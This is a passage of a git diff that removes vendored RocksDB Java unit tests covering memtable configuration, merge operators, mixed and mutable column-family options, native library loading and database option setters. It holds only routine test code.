-      assertThat(hashLinkedListMemTableConfig.hugePageTlbSize()).
-          isEqualTo(1);
-      assertThat(hashLinkedListMemTableConfig.
-          bucketEntriesLoggingThreshold()).
-          isEqualTo(4096);
-      hashLinkedListMemTableConfig.
-          setBucketEntriesLoggingThreshold(200);
-      assertThat(hashLinkedListMemTableConfig.
-          bucketEntriesLoggingThreshold()).
-          isEqualTo(200);
-      assertThat(hashLinkedListMemTableConfig.
-          ifLogBucketDistWhenFlush()).isTrue();
-      hashLinkedListMemTableConfig.
-          setIfLogBucketDistWhenFlush(false);
-      assertThat(hashLinkedListMemTableConfig.
-          ifLogBucketDistWhenFlush()).isFalse();
-      assertThat(hashLinkedListMemTableConfig.
-          thresholdUseSkiplist()).
-          isEqualTo(256);
-      hashLinkedListMemTableConfig.setThresholdUseSkiplist(29);
-      assertThat(hashLinkedListMemTableConfig.
-          thresholdUseSkiplist()).
-          isEqualTo(29);
-      options.setMemTableConfig(hashLinkedListMemTableConfig);
-    }
-  }
-
-  @Test
-  public void vectorMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      VectorMemTableConfig vectorMemTableConfig =
-          new VectorMemTableConfig();
-      assertThat(vectorMemTableConfig.reservedSize()).
-          isEqualTo(0);
-      vectorMemTableConfig.setReservedSize(123);
-      assertThat(vectorMemTableConfig.reservedSize()).
-          isEqualTo(123);
-      options.setMemTableConfig(vectorMemTableConfig);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MergeTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MergeTest.java
deleted file mode 100644
index 73b9086..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MergeTest.java
+++ /dev/null
@@ -1,240 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Arrays;
-import java.util.List;
-import java.util.ArrayList;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MergeTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void stringOption()
-      throws InterruptedException, RocksDBException {
-    try (final Options opt = new Options()
-        .setCreateIfMissing(true)
-        .setMergeOperatorName("stringappend");
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // writing aa under key
-      db.put("key".getBytes(), "aa".getBytes());
-      // merge bb under key
-      db.merge("key".getBytes(), "bb".getBytes());
-
-      final byte[] value = db.get("key".getBytes());
-      final String strValue = new String(value);
-      assertThat(strValue).isEqualTo("aa,bb");
-    }
-  }
-
-  @Test
-  public void cFStringOption()
-      throws InterruptedException, RocksDBException {
-
-    try (final ColumnFamilyOptions cfOpt1 = new ColumnFamilyOptions()
-        .setMergeOperatorName("stringappend");
-         final ColumnFamilyOptions cfOpt2 = new ColumnFamilyOptions()
-             .setMergeOperatorName("stringappend")
-    ) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpt1),
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpt2)
-      );
-
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final DBOptions opt = new DBOptions()
-          .setCreateIfMissing(true)
-          .setCreateMissingColumnFamilies(true);
-           final RocksDB db = RocksDB.open(opt,
-               dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-               columnFamilyHandleList)) {
-        try {
-          // writing aa under key
-          db.put(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "aa".getBytes());
-          // merge bb under key
-          db.merge(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "bb".getBytes());
-
-          byte[] value = db.get(columnFamilyHandleList.get(1),
-              "cfkey".getBytes());
-          String strValue = new String(value);
-          assertThat(strValue).isEqualTo("aa,bb");
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandleList) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void operatorOption()
-      throws InterruptedException, RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final Options opt = new Options()
-            .setCreateIfMissing(true)
-            .setMergeOperator(stringAppendOperator);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // Writing aa under key
-      db.put("key".getBytes(), "aa".getBytes());
-
-      // Writing bb under key
-      db.merge("key".getBytes(), "bb".getBytes());
-
-      final byte[] value = db.get("key".getBytes());
-      final String strValue = new String(value);
-
-      assertThat(strValue).isEqualTo("aa,bb");
-    }
-  }
-
-  @Test
-  public void cFOperatorOption()
-      throws InterruptedException, RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final ColumnFamilyOptions cfOpt1 = new ColumnFamilyOptions()
-             .setMergeOperator(stringAppendOperator);
-         final ColumnFamilyOptions cfOpt2 = new ColumnFamilyOptions()
-             .setMergeOperator(stringAppendOperator)
-    ) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpt1),
-          new ColumnFamilyDescriptor("new_cf".getBytes(), cfOpt2)
-      );
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final DBOptions opt = new DBOptions()
-          .setCreateIfMissing(true)
-          .setCreateMissingColumnFamilies(true);
-           final RocksDB db = RocksDB.open(opt,
-               dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-               columnFamilyHandleList)
-      ) {
-        try {
-          // writing aa under key
-          db.put(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "aa".getBytes());
-          // merge bb under key
-          db.merge(columnFamilyHandleList.get(1),
-              "cfkey".getBytes(), "bb".getBytes());
-          byte[] value = db.get(columnFamilyHandleList.get(1),
-              "cfkey".getBytes());
-          String strValue = new String(value);
-
-          // Test also with createColumnFamily
-          try (final ColumnFamilyOptions cfHandleOpts =
-                   new ColumnFamilyOptions()
-                       .setMergeOperator(stringAppendOperator);
-               final ColumnFamilyHandle cfHandle =
-                   db.createColumnFamily(
-                       new ColumnFamilyDescriptor("new_cf2".getBytes(),
-                           cfHandleOpts))
-          ) {
-            // writing xx under cfkey2
-            db.put(cfHandle, "cfkey2".getBytes(), "xx".getBytes());
-            // merge yy under cfkey2
-            db.merge(cfHandle, new WriteOptions(), "cfkey2".getBytes(),
-                "yy".getBytes());
-            value = db.get(cfHandle, "cfkey2".getBytes());
-            String strValueTmpCf = new String(value);
-
-            assertThat(strValue).isEqualTo("aa,bb");
-            assertThat(strValueTmpCf).isEqualTo("xx,yy");
-          }
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              columnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void operatorGcBehaviour()
-      throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator()) {
-      try (final Options opt = new Options()
-              .setCreateIfMissing(true)
-              .setMergeOperator(stringAppendOperator);
-           final RocksDB db = RocksDB.open(opt,
-                   dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-
-
-      // test reuse
-      try (final Options opt = new Options()
-              .setMergeOperator(stringAppendOperator);
-           final RocksDB db = RocksDB.open(opt,
-                   dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-
-      // test param init
-      try (final StringAppendOperator stringAppendOperator2 = new StringAppendOperator();
-           final Options opt = new Options()
-              .setMergeOperator(stringAppendOperator2);
-           final RocksDB db = RocksDB.open(opt,
-                   dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-
-      // test replace one with another merge operator instance
-      try (final Options opt = new Options()
-              .setMergeOperator(stringAppendOperator);
-           final StringAppendOperator newStringAppendOperator = new StringAppendOperator()) {
-        opt.setMergeOperator(newStringAppendOperator);
-        try (final RocksDB db = RocksDB.open(opt,
-                dbFolder.getRoot().getAbsolutePath())) {
-          //no-op
-        }
-      }
-    }
-  }
-
-  @Test
-  public void emptyStringInSetMergeOperatorByName() {
-    try (final Options opt = new Options()
-        .setMergeOperatorName("");
-         final ColumnFamilyOptions cOpt = new ColumnFamilyOptions()
-             .setMergeOperatorName("")) {
-      //no-op
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void nullStringInSetMergeOperatorByNameOptions() {
-    try (final Options opt = new Options()) {
-      opt.setMergeOperatorName(null);
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void
-  nullStringInSetMergeOperatorByNameColumnFamilyOptions() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      opt.setMergeOperatorName(null);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MixedOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MixedOptionsTest.java
deleted file mode 100644
index ff68b1b..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MixedOptionsTest.java
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MixedOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void mixedOptionsTest(){
-    // Set a table factory and check the names
-    try(final Filter bloomFilter = new BloomFilter();
-        final ColumnFamilyOptions cfOptions = new ColumnFamilyOptions()
-            .setTableFormatConfig(
-                new BlockBasedTableConfig().setFilter(bloomFilter))
-    ) {
-      assertThat(cfOptions.tableFactoryName()).isEqualTo(
-          "BlockBasedTable");
-      cfOptions.setTableFormatConfig(new PlainTableConfig());
-      assertThat(cfOptions.tableFactoryName()).isEqualTo("PlainTable");
-      // Initialize a dbOptions object from cf options and
-      // db options
-      try (final DBOptions dbOptions = new DBOptions();
-           final Options options = new Options(dbOptions, cfOptions)) {
-        assertThat(options.tableFactoryName()).isEqualTo("PlainTable");
-        // Free instances
-      }
-    }
-
-    // Test Optimize for statements
-    try(final ColumnFamilyOptions cfOptions = new ColumnFamilyOptions()) {
-    cfOptions.optimizeUniversalStyleCompaction();
-    cfOptions.optimizeLevelStyleCompaction();
-    cfOptions.optimizeForPointLookup(1024);
-    try(final Options options = new Options()) {
-        options.optimizeLevelStyleCompaction();
-        options.optimizeLevelStyleCompaction(400);
-        options.optimizeUniversalStyleCompaction();
-        options.optimizeUniversalStyleCompaction(400);
-        options.optimizeForPointLookup(1024);
-        options.prepareForBulkLoad();
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
deleted file mode 100644
index f631905..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
+++ /dev/null
@@ -1,88 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.Test;
-import org.rocksdb.MutableColumnFamilyOptions.MutableColumnFamilyOptionsBuilder;
-
-import java.util.NoSuchElementException;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MutableColumnFamilyOptionsTest {
-
-  @Test
-  public void builder() {
-    final MutableColumnFamilyOptionsBuilder builder =
-        MutableColumnFamilyOptions.builder();
-        builder
-            .setWriteBufferSize(10)
-            .setInplaceUpdateNumLocks(5)
-            .setDisableAutoCompactions(true)
-            .setParanoidFileChecks(true);
-
-    assertThat(builder.writeBufferSize()).isEqualTo(10);
-    assertThat(builder.inplaceUpdateNumLocks()).isEqualTo(5);
-    assertThat(builder.disableAutoCompactions()).isEqualTo(true);
-    assertThat(builder.paranoidFileChecks()).isEqualTo(true);
-  }
-
-  @Test(expected = NoSuchElementException.class)
-  public void builder_getWhenNotSet() {
-    final MutableColumnFamilyOptionsBuilder builder =
-        MutableColumnFamilyOptions.builder();
-
-    builder.writeBufferSize();
-  }
-
-  @Test
-  public void builder_build() {
-    final MutableColumnFamilyOptions options = MutableColumnFamilyOptions
-        .builder()
-          .setWriteBufferSize(10)
-          .setParanoidFileChecks(true)
-          .build();
-
-    assertThat(options.getKeys().length).isEqualTo(2);
-    assertThat(options.getValues().length).isEqualTo(2);
-    assertThat(options.getKeys()[0])
-        .isEqualTo(
-            MutableColumnFamilyOptions.MemtableOption.write_buffer_size.name());
-    assertThat(options.getValues()[0]).isEqualTo("10");
-    assertThat(options.getKeys()[1])
-        .isEqualTo(
-            MutableColumnFamilyOptions.MiscOption.paranoid_file_checks.name());
-    assertThat(options.getValues()[1]).isEqualTo("true");
-  }
-
-  @Test
-  public void mutableColumnFamilyOptions_toString() {
-    final String str = MutableColumnFamilyOptions
-        .builder()
-        .setWriteBufferSize(10)
-        .setInplaceUpdateNumLocks(5)
-        .setDisableAutoCompactions(true)
-        .setParanoidFileChecks(true)
-        .build()
-        .toString();
-
-    assertThat(str).isEqualTo("write_buffer_size=10;inplace_update_num_locks=5;"
-        + "disable_auto_compactions=true;paranoid_file_checks=true");
-  }
-
-  @Test
-  public void mutableColumnFamilyOptions_parse() {
-    final String str = "write_buffer_size=10;inplace_update_num_locks=5;"
-        + "disable_auto_compactions=true;paranoid_file_checks=true";
-
-    final MutableColumnFamilyOptionsBuilder builder =
-        MutableColumnFamilyOptions.parse(str);
-
-    assertThat(builder.writeBufferSize()).isEqualTo(10);
-    assertThat(builder.inplaceUpdateNumLocks()).isEqualTo(5);
-    assertThat(builder.disableAutoCompactions()).isEqualTo(true);
-    assertThat(builder.paranoidFileChecks()).isEqualTo(true);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
deleted file mode 100644
index ab60081..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.rocksdb.util.Environment;
-
-import java.io.File;
-import java.io.IOException;
-import java.nio.file.*;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class NativeLibraryLoaderTest {
-
-  @Rule
-  public TemporaryFolder temporaryFolder = new TemporaryFolder();
-
-  @Test
-  public void tempFolder() throws IOException {
-    NativeLibraryLoader.getInstance().loadLibraryFromJarToTemp(
-        temporaryFolder.getRoot().getAbsolutePath());
-    final Path path = Paths.get(temporaryFolder.getRoot().getAbsolutePath(),
-        Environment.getJniLibraryFileName("rocksdb"));
-    assertThat(Files.exists(path)).isTrue();
-    assertThat(Files.isReadable(path)).isTrue();
-  }
-
-  @Test
-  public void overridesExistingLibrary() throws IOException {
-    File first = NativeLibraryLoader.getInstance().loadLibraryFromJarToTemp(
-        temporaryFolder.getRoot().getAbsolutePath());
-    NativeLibraryLoader.getInstance().loadLibraryFromJarToTemp(
-        temporaryFolder.getRoot().getAbsolutePath());
-    assertThat(first.exists()).isTrue();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/OptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/OptionsTest.java
deleted file mode 100644
index 6afcab3..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/OptionsTest.java
+++ /dev/null
@@ -1,1095 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Paths;
-import java.util.ArrayList;
-import java.util.Collections;
-import java.util.List;
-import java.util.Random;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class OptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void setIncreaseParallelism() {
-    try (final Options opt = new Options()) {
-      final int threads = Runtime.getRuntime().availableProcessors() * 2;
-      opt.setIncreaseParallelism(threads);
-    }
-  }
-
-  @Test
-  public void writeBufferSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteBufferSize(longValue);
-      assertThat(opt.writeBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumber() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxWriteBufferNumber(intValue);
-      assertThat(opt.maxWriteBufferNumber()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void minWriteBufferNumberToMerge() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMinWriteBufferNumberToMerge(intValue);
-      assertThat(opt.minWriteBufferNumberToMerge()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void numLevels() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setNumLevels(intValue);
-      assertThat(opt.numLevels()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroFileNumCompactionTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroFileNumCompactionTrigger(intValue);
-      assertThat(opt.levelZeroFileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroSlowdownWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroSlowdownWritesTrigger(intValue);
-      assertThat(opt.levelZeroSlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroStopWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroStopWritesTrigger(intValue);
-      assertThat(opt.levelZeroStopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeBase() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setTargetFileSizeBase(longValue);
-      assertThat(opt.targetFileSizeBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeMultiplier() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setTargetFileSizeMultiplier(intValue);
-      assertThat(opt.targetFileSizeMultiplier()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelBase() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxBytesForLevelBase(longValue);
-      assertThat(opt.maxBytesForLevelBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void levelCompactionDynamicLevelBytes() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setLevelCompactionDynamicLevelBytes(boolValue);
-      assertThat(opt.levelCompactionDynamicLevelBytes())
-          .isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplier() {
-    try (final Options opt = new Options()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMaxBytesForLevelMultiplier(doubleValue);
-      assertThat(opt.maxBytesForLevelMultiplier()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplierAdditional() {
-    try (final Options opt = new Options()) {
-      final int intValue1 = rand.nextInt();
-      final int intValue2 = rand.nextInt();
-      final int[] ints = new int[]{intValue1, intValue2};
-      opt.setMaxBytesForLevelMultiplierAdditional(ints);
-      assertThat(opt.maxBytesForLevelMultiplierAdditional()).isEqualTo(ints);
-    }
-  }
-
-  @Test
-  public void maxCompactionBytes() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxCompactionBytes(longValue);
-      assertThat(opt.maxCompactionBytes()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void softPendingCompactionBytesLimit() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setSoftPendingCompactionBytesLimit(longValue);
-      assertThat(opt.softPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void hardPendingCompactionBytesLimit() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setHardPendingCompactionBytesLimit(longValue);
-      assertThat(opt.hardPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void level0FileNumCompactionTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0FileNumCompactionTrigger(intValue);
-      assertThat(opt.level0FileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0SlowdownWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0SlowdownWritesTrigger(intValue);
-      assertThat(opt.level0SlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0StopWritesTrigger() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0StopWritesTrigger(intValue);
-      assertThat(opt.level0StopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void arenaBlockSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setArenaBlockSize(longValue);
-      assertThat(opt.arenaBlockSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void disableAutoCompactions() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDisableAutoCompactions(boolValue);
-      assertThat(opt.disableAutoCompactions()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxSequentialSkipInIterations() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSequentialSkipInIterations(longValue);
-      assertThat(opt.maxSequentialSkipInIterations()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateSupport() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setInplaceUpdateSupport(boolValue);
-      assertThat(opt.inplaceUpdateSupport()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateNumLocks() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setInplaceUpdateNumLocks(longValue);
-      assertThat(opt.inplaceUpdateNumLocks()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void memtablePrefixBloomSizeRatio() {
-    try (final Options opt = new Options()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMemtablePrefixBloomSizeRatio(doubleValue);
-      assertThat(opt.memtablePrefixBloomSizeRatio()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void memtableHugePageSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMemtableHugePageSize(longValue);
-      assertThat(opt.memtableHugePageSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void bloomLocality() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setBloomLocality(intValue);
-      assertThat(opt.bloomLocality()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSuccessiveMerges() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSuccessiveMerges(longValue);
-      assertThat(opt.maxSuccessiveMerges()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void optimizeFiltersForHits() {
-    try (final Options opt = new Options()) {
-      final boolean aBoolean = rand.nextBoolean();
-      opt.setOptimizeFiltersForHits(aBoolean);
-      assertThat(opt.optimizeFiltersForHits()).isEqualTo(aBoolean);
-    }
-  }
-
-  @Test
-  public void createIfMissing() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateIfMissing(boolValue);
-      assertThat(opt.createIfMissing()).
-          isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void createMissingColumnFamilies() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateMissingColumnFamilies(boolValue);
-      assertThat(opt.createMissingColumnFamilies()).
-          isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void errorIfExists() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setErrorIfExists(boolValue);
-      assertThat(opt.errorIfExists()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void paranoidChecks() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setParanoidChecks(boolValue);
-      assertThat(opt.paranoidChecks()).
-          isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxTotalWalSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxTotalWalSize(longValue);
-      assertThat(opt.maxTotalWalSize()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxOpenFiles() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxOpenFiles(intValue);
-      assertThat(opt.maxOpenFiles()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxFileOpeningThreads() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxFileOpeningThreads(intValue);
-      assertThat(opt.maxFileOpeningThreads()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void useFsync() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseFsync(boolValue);
-      assertThat(opt.useFsync()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbPaths() {
-    final List<DbPath> dbPaths = new ArrayList<>();
-    dbPaths.add(new DbPath(Paths.get("/a"), 10));
-    dbPaths.add(new DbPath(Paths.get("/b"), 100));
-    dbPaths.add(new DbPath(Paths.get("/c"), 1000));
-
-    try (final Options opt = new Options()) {
-      assertThat(opt.dbPaths()).isEqualTo(Collections.emptyList());
-
-      opt.setDbPaths(dbPaths);
-
-      assertThat(opt.dbPaths()).isEqualTo(dbPaths);
-    }
-  }
-
-  @Test
-  public void dbLogDir() {
-    try (final Options opt = new Options()) {
-      final String str = "path/to/DbLogDir";
-      opt.setDbLogDir(str);
-      assertThat(opt.dbLogDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void walDir() {
-    try (final Options opt = new Options()) {
-      final String str = "path/to/WalDir";
-      opt.setWalDir(str);
-      assertThat(opt.walDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void deleteObsoleteFilesPeriodMicros() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setDeleteObsoleteFilesPeriodMicros(longValue);
-      assertThat(opt.deleteObsoleteFilesPeriodMicros()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void baseBackgroundCompactions() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setBaseBackgroundCompactions(intValue);
-      assertThat(opt.baseBackgroundCompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundCompactions() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundCompactions(intValue);
-      assertThat(opt.maxBackgroundCompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSubcompactions() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxSubcompactions(intValue);
-      assertThat(opt.maxSubcompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundFlushes() {
-    try (final Options opt = new Options()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundFlushes(intValue);
-      assertThat(opt.maxBackgroundFlushes()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxLogFileSize() throws RocksDBException {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxLogFileSize(longValue);
-      assertThat(opt.maxLogFileSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void logFileTimeToRoll() throws RocksDBException {
-    try (final Options opt = new Options()) {
